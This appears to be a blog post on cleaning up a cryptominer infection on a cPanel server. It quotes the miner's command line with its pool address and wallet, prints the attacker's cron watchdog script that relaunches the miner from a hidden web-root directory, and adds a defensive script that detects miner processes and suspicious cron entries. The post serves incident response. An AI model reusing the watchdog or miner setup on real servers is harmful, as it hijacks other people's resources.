Recently one of the servers under my control was infected with mining software. It caused unnecessary load and wasted server resources.
Since the server runs cPanel, I used WHM to track down the source. In WHM's 'Process Manager' and 'Daily Process Log' I found entries like this:
impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x
The process runs as the cPanel user impxxxx and sits at 98.5% CPU. Its process name is '-bash', which makes it look like a login shell in a process list, but the arguments give it away: '-a cryptonight' is a CPU mining algorithm, '-o stratum+tcp://...:14444' is a mining pool endpoint, and the long string after '-u' is the attacker's wallet address. Use 'Process Manager' to kill the PID running that process. Killing it alone is not enough, though: anything that started the miner can start it again, so the next step is to find what launched it.
I checked the user's cPanel account and found a strange cron job pointing to an odd, hidden path under the web root, e.g.:
/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
So I read the contents of the file with cat:
[root@svr2 ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
if $(kill -CHLD $pid >/dev/null 2>&1)
then
exit 0
fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null
This script is a watchdog. If bash.pid exists, it reads the PID stored there and sends it SIGCHLD; that signal is ignored by default, so it does nothing to the target, but kill only succeeds if a process with that PID exists, which makes it a cheap liveness check (the same trick as 'kill -0'). If the miner is still alive the script exits; otherwise it changes into the hidden .qts directory and relaunches ./r in the background. That is why killing the process from 'Process Manager' only helps until the next cron run.
Next, go into the directory and see what is inside:
[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@svr2 .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x
The presence of bash.pid, together with the watchdog script and the r binary it launches, confirms that the mining was started from this path. Before removing anything, it is worth copying the directory somewhere outside the web root for later analysis, and checking the other cPanel accounts for the same hidden directory and cron entry, since a shared server rarely has just one affected account.
Delete the folder and remove the cron job from the user's cPanel (or with 'crontab -e -u impxxxx') so the mining stops and does not come back. Finally, work out how the attacker got write access to public_html in the first place; until that is fixed, the same files will be dropped again.
[root@svr2 .qts]# cd ..
[root@svr2 includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
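The triage above was done by hand in WHM. As an added example that is not part of the original post, the following shell helpers automate the two checks it relied on: flagging processes whose command line carries miner indicators (pool URL, algorithm name, or a high-CPU process masquerading as a login shell) and flagging cron entries that execute from a hidden directory or a temp filesystem. The sample process list and crontab are constructed to resemble the post's findings; on a real server you would feed them from 'ps -eo user,pcpu,args --no-headers' and 'crontab -l -u USER'.

```shell
#!/bin/sh
# Added example (not code from the original post): shell helpers that
# triage a process list and a crontab for cryptominer indicators.
# SAMPLE_PS and SAMPLE_CRON are constructed inputs modelled on the post.

# Constructed sample of: ps -eo user,pcpu,args --no-headers
# Line 1 is the miner from the post; line 2 is a renamed miner with no
# obvious keyword; line 4 is a genuine root login shell (must not match).
SAMPLE_PS='impxxxx 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x
impxxxx 96.2 -bash --config=/dev/shm/.cfg.json
nobody 1.2 /usr/sbin/httpd -k start
root 0.0 -bash
impxxxx 0.3 php-fpm: pool impxxxx'

# Constructed sample of: crontab -l -u impxxxx
# Line 1 is the watchdog from the post; line 2 is a legitimate site cron.
SAMPLE_CRON='*/5 * * * * /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd >/dev/null 2>&1
0 2 * * * /usr/local/bin/php /home/impxxxx/public_html/cron.php
@reboot /dev/shm/.x/r'

# Print process lines that look like a miner:
#  - command line mentions a stratum pool URL or a known CPU-mining
#    algorithm / miner name, or
#  - argv[0] is "-bash" (a login shell) yet it has extra arguments and
#    burns more than 50% CPU, which a real login shell never does.
flag_miner_procs() {
    printf '%s\n' "$1" | awk '
        tolower($0) ~ /stratum[+](tcp|ssl):\/\/|cryptonight|randomx|xmrig|minerd/ { print; next }
        $3 == "-bash" && NF > 3 && $2+0 > 50 { print }
    '
}

# Print cron entries whose command runs from a hidden directory
# (a "/.name/" path component, like /.qts/) or from a temp filesystem
# (/tmp, /var/tmp, /dev/shm), where web shells and droppers usually land.
flag_cron_entries() {
    printf '%s\n' "$1" | awk '
        /\/\.[^\/]+\// || /\/tmp\// || /\/var\/tmp\// || /\/dev\/shm\// { print }
    '
}

# Extract the pool endpoint (-o) and wallet (-u) from one miner command
# line, for firewalling the pool and reporting the wallet. Prints
# "POOL WALLET" on a single line.
miner_iocs() {
    printf '%s\n' "$1" | awk '{
        for (i = 1; i <= NF; i++) {
            if ($i == "-o") pool = $(i + 1)
            if ($i == "-u") wallet = $(i + 1)
        }
        print pool, wallet
    }'
}

echo "== suspicious processes =="
flag_miner_procs "$SAMPLE_PS"
echo "== IOCs from first hit =="
miner_iocs "$(flag_miner_procs "$SAMPLE_PS" | head -n 1)"
echo "== suspicious cron entries =="
flag_cron_entries "$SAMPLE_CRON"
```

The second rule in flag_miner_procs is the one that matters once attackers strip the obvious keywords: a process named "-bash" that has its own command-line options and is pegging a core is not a shell. The cron check deliberately ignores ordinary paths under public_html, since legitimate sites run cron jobs from there too; it keys on the hidden-directory and temp-filesystem patterns that the post's sample used.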
Do you have any idea how they infected the server in the first place? How did they upload the bash.pid file onto the server?
Outdated script…